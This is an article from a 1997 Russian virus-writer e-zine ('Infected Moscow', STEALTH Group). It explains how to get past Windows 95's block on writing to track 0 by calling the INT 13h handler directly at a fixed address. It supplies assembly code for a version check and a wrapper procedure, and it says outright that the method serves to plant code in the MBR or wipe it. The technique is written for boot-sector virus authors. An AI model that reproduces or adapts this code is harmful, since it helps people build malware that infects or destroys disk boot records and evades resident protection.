┌────────────────┬──┬────────┬─────────────────────────────┬─────────────────┐
│INFECTED MOSCOW │#1│ JAN'97 │(C)STEALTH Group MoscoW & Co │ one@redline.ru~ │
└────────────────┴──┴────────┴─────────────────────────────┴─────────────────┘
┌─────────────────────────────────────────────────┬────────────────────────┐
│ Запись в 0 дорожку под Windows'95               │(C) LovinGOD            │
└─────────────────────────────────────────────────┴────────────────────────┘

      Мало того, что существуют разные резидентные мониторы, Virus Warning'и
из CMOS, так еще и Windows'95 решила покачать свои права на единоличное обла-
дание нулевой дорожкой.

	Windows'95 не дает записывать в 0 дорожку через INT 13h.
Более того, INT 13h находится в защищенной памяти и попытка протрассировать
его (Turbo Debugger) оканчивается безуспешно (выбрасыванием по адресу 0:0).
При записи в 0 дорожку по INT 13h как бы ничего не происходит, прерывание
возвращает прежние значения и запись не производится. Проблем с чтением нет.

Для обхода запрета используется вектор INT 13h, полученный при загрузке 
компьютера в режиме MS-DOS. Можно утверждать, что адрес, полученный debug'ом
в голом DOS'e, будет одинаковым для всех версий DOS 7.0 под Windows'95.

                      Адрес вектора INT 13h 
                             0070:03EE


Обращаясь по этому адресу, вы можете спокойно посадить что-нибудь в MBR,
разнести тот же MBR или использовать 0 дорожку для собственных нужд.

Предупреждаю, что данный метод не тестировался с WinNT и OS/2.


Для совместимости вашего изделия с Windows'95 делаем так:

 XOR BH,BH			; обьяснения этой строки см. далее
 MOV AX,160A			; проверка версии Windows
 INT 2F
 MOV 1 PTR DS:[WinVersion],BH   ; если Windows не загружен, то в BH будет 00
				; (см. первую строку)
 OR  AX,AX			; если Windows не загружен, то в AX останется
				; 160Ah
 JNZ Windows_Inactive

Вместо инструкции "INT 13h" вызывайте процедуру "CALL INT_13"

Процедура вызова INT 13h:

INT_13 PROC
  PUSH AX
				; для экономии места переменная WinVersion
				; встроена в команду "MOV AL,.."
  WinVersion EQU $+1
  MOV AL,00

  CMP AL,4
  POP AX
  JNE JUST_INT13
				; вызов int 13h в случае активной Windows'95
  PUSHF
  DB 09A
  DD 007003EEh
  RETN
				; просто int 13h
  JUST_INT13: INT 13
  RETN
  INT_13 ENDP

